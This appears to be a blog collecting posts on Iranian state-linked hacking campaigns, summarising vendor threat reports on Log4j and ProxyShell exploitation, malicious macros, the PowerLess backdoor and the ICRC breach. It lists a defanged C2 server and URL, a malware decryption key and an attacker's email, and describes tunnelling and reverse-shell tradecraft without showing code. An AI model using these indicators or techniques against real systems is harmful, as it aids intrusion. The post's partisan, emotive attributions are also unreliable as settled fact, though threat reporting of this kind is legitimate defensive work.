Is TunnelVision a NEW hacking group controlled by Iranian State???

TunnelVision.. a new Iranian State Actor 

Sentinel Labs reports that potential new Iranian hacking group called TunnelVision have been discovered! They are called TunnelVision because of their constant and excessive reliance on tunneling tools to achieve evil goals. TunnelVision has been caught exploiting the Log4j vulnerability to gain backdoor access to VMWare Horizon.

PowerShell code used to perform exploit 

TunnelVision have been spotted exploiting Fortinet FortiOS Vulnerability CVE-2018-13379 Microsoft Exchange vulnerability ProxyShell and now most recent Log4J. It was easy for Sentinel Labs to attribute this activity to TunnelVision as every time they exploited a innocent victim they used a unique way of tunneling to do so. They relied heavily on Fast Reverse Proxy Client FRPC and Plink to commit their crimes.  

PowerShell code used for Reverse Shells 

The Log4j Exploit is used by TunnelVision by running malicious commands from Tomcat.exe executable in VMWare horizon and then use  Tunneling server 142.44.135[.]86  to link up to a lot of C2 servers like hxxp://google.onedriver-srv.ml/gadfTs55sghsSSS. 

Sentinel Labs also says that TunnelVision could be Charming Kitten AKA Nemesis Kitten AKA APT35 trying out a new evil hacking method but it is not clear if this is the case at this time period.

When will this regime stop meddling?? 🙄🙄

Iran behind hack of Red Cross?? 😱 🏥

Iranian Regime hacking Red Cross! 

Hello my friends 🙏

It has been reported that International Committee for Red Cross ICRC has been hacked and that Iran were behind it. 

ICRC went public on January 19th 2022 stating that their servers had been hacked and that personal records of over half a million people who are receiving aid from Red Cross has been affected. These extremely venerable people are all linked to the restoring family links section of Red Cross but Iranian regime has prove it doesn't care about human rights anyway. 

The Hack itself occurred on November 9th 2021 using CVE-2021-40539 vulnerability on  ADSelfService plus. When ICRC went public with this news in January a cyber actor called Sheriff went onto Raid Forums and tried to sell the leaked dataset. The Email account used for Sheriff to register to Raid Forums was  kelvinmiddelkoop@hotmail.com which was named in court documents linked to an Iranian disinformation media campaign which proves regime guilt. 

Sheriff also seemed to suggest that a ransom attempt had been made to ICRC stating that Mr. Mardini, your words have been heard. Check your email and send a figure you can pay. Mr. Mardini is General of ICRC. ICRC states that they have never had any contact with people who hacker their servers.

Sheriff also is trying to buy Penetration Testing tool Cobalt Strike offering $3000 for a cracked version. Sheriff was  referred to Raid Forums by Pompompurin who says I know who sheriff is but im not saying anything.

Account of Sheriff on Raid Forums

It is evident that not only do this cruel and Evil regime like to prey on people who are desperate and vulnerable but that they also want to hack even more people by getting Cobalt Strike. Please my friends ensure that all your software is patched and up to date.  

Iranian Hacking Group MuddyWater targeting Turkish Hospitals! 😠 Using Malicious PDF and XLS files to execute PowerShell Scripts

Cisco Talos reports that the Iranian-backed hacking group MuddyWater AKA MERCURY AKA Static Kitten has been caught on another hacking campaign this time targeting Turkish hospitals 😡 and other government departments in Turkey. The campaign used malicious PDF and XLS files with embedded VBA macros. These macros contain VBA and PowerShell destructive scripts that run and allow MuddyWater to access the victim system via C2.😤😤

Another high profile target of this MuddyWater campaign was Tubitak which is the Scientific and technological research council in Turkey. PDFs and XLS files were hosted on a domain named snapfile.org and has been social engineered to lure victims in like example below 

Example Malicious PDF file MuddyWater attack victims with 

Malicious files were also named as legitimate files in order to masquerade Turkish Health Department 

Malicious XLS files posted with Fake names by MuddyWater

Embedded VBA and PowerShell scripts are then executed in file which will download other PowerShell modules and infect victims system. VBA macros all had a registry key included too. VBA and first PowerShell script will then download a 2nd PowerShell Script that will give MuddyWater C2 capability 

Malicious PowerShell Script

Talos were able to know MuddyWater was behind this attack due to sloppy behavior by the group. One of IP Addresses used for C2 server was used in January 2021 by MuddyWater. They are also using tracking tokens from Canary Tokens to see how many systems are affected. They also need to use a LOLBin script to be able to execute PowerShell script. 

Turkey has been an Ally to this regime supporting Hamas! and now they target a Hospital? This extent of Evil in this regime knows no bounds!! 👺👺👺

Iranian Hacking Group Phosphorus AKA APT35 AKA Charming Kitten causing DESTRUCTION again!! Using new PowerShell backdoor and Memento Ransomware 🦠️🦠️

 Iranian Hacking group Phosphorus also known as  APT35 and Charming Kitten 

Cyber ​​Reason reports that Iranian Hacking group Phosphorus also known as  APT35 and Charming Kitten have been looking to cause damage and chaos again to innocent people, this time using Microsoft Exchange Server vulnerability ProxyShell as well as using a new stealthy PowerShell backdoor called PowerLess. 

PowerLess is highly modular malware used to connect to a C2 server controlled by Phosphorus and will then used to steal browser data and perform keylogging as well as a whole host of other malicious actions.

A technical inspection revealed that first a malicious file called windowsprocesses.exe was executed and then a new file called dll.dll was loaded. This DLL file is probably inspired by the code on GitHub by farzinenddo, which runs PowerShell with the CLR. dll.dll is a .NET AES decoder with an encrypted key () * & 3dCfabE2 / 123, which then decrypts a file called upc. Upc is then used to run the latest PowerShell malicious script called PowerLess.

PowerLess malicious code

In an interesting turn of events it seems like Charming Kitten also is behind devastating Momento Ransomware as an IP address used for C2 server found in PowerLess code is also being used for Memento! 

Phosphorus also known as  APT35 and Charming Kitten must be stopped! 😤

Iranian Regime broadcaster IRIB HACKED AGAIN for second time: Hacker Group Edaalate-Ali URGE Iranians to protest against wicked regime!

RadioFarda reports that Broadcaster IRIB which is responsible for most of Regime's propaganda was hacked again for second time in a week this time by hacker group Edaalate-Ali. 

While millions of Iranian people were watching Iranian National Team play against UAE on Telewebion which is IRIB's web streaming service, a 50-second explosive video interrupted play which aired Iranians to protest against Khamenei wicked regime during Fajr Decade. Fajr decade is a 11-day so called celebration of 1979 revolution that takes place every year between February 1 and February 11.

Hacker Group Edaalate-Ali 

This was SECOND time in a week that IRIB was hacked. On January 27 I reported that IRIB was hacked and a 10 second video was shown live on Channel 1 with quotes from video saying Death to Khamenei! 

My tweet on first IRIB hack

It is clear that the Iranian people have had enough of this corrupt Iranian regime! Protest and uprising will win! 🙌🙌

FBI warns Iranian Hackers Emen Net Pasargad pose ENORMOUS threat

Emen Net Pasargad Iranian Hacker Group 

The FBI recently announced that Emen net Pasargad an Iranian hacker group that successfully posed as far right US political group Proud Boys in the 2020 US presidential election is now a much bigger threat than it initially was.

In an notification alert  FBI warns that Emen net Pasargad is far more than just completing false information campaigns because new research shows that they are using common cyber exploitation tactics. Emen net Pasargad uses VPN services such as TorGuard and CyberGhost to execute attacks. They then look for businesses in the United States Europe and the Middle East and scan vulnerabilities and shared hosting services for misuse. Emen net Pasargad seems to want to find PHP web pages and MySQL databases that allow external access. PHPMyAdmin is one of Emen net Pasargad favorites also like WordPress and Tomcat. It has been confirmed that Emennet Pasargad uses Shodan and SQLMap to brutally exploit innocent businesses.

PHPMyAdmin a favorite to hack by Emen net Pasargad 

Please protect your friends from this evil group. Make sure all systems that interact with WordPress PHP or MySQL are patched and running up-to-date updates. Do not be abused by this group! 😤